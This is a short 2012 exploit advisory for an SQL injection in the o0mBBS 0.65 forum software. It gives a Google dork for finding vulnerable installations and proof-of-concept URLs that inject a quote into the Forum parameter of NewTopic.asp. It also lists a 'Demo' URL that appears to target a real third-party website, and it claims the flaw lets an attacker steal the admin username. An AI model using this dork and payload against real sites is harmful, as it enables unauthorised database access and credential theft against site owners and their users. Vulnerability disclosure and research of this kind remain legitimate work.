# --------------------------------------- #
Author : L3b-r1'z
Title : o0mBBS Sql Injection
Date : 6/12/2012
Email : L3br1z@Gmail.com
Site : Sec4Ever.com & Exploit4arab.com
Google Dork : allintext: "o0mBBS version 0.65B"
Version : 0.65
# --------------------------------------- #
1) Bug
2) PoC
# --------------------------------------- #
2) Bug :
 Attacker Can Injection Database And Steal The Username And Admin.
# --------------------------------------- #
3) PoC :

 http://localhost/o0m/NewTopic.asp?Type=NewTopic&Forum=[SQL]
 http://localhost/o0m/NewTopic.asp?Type=NewTopic&Forum=2'

   Demo :

   http://www.oasitech.it/o0m/NewTopic.asp?Type=NewTopic&Forum=2%27
# --------------------------------------- #
Thx To : I-Hmx , B0X , Hacker-1420 , Damane2011 , Sec4ever , The Injector ,
Over-X , Ked-Ans , N4SS1M , B07 M4ST3R , Black-ID , Abu Hamid Madridi.
# --------------------------------------- #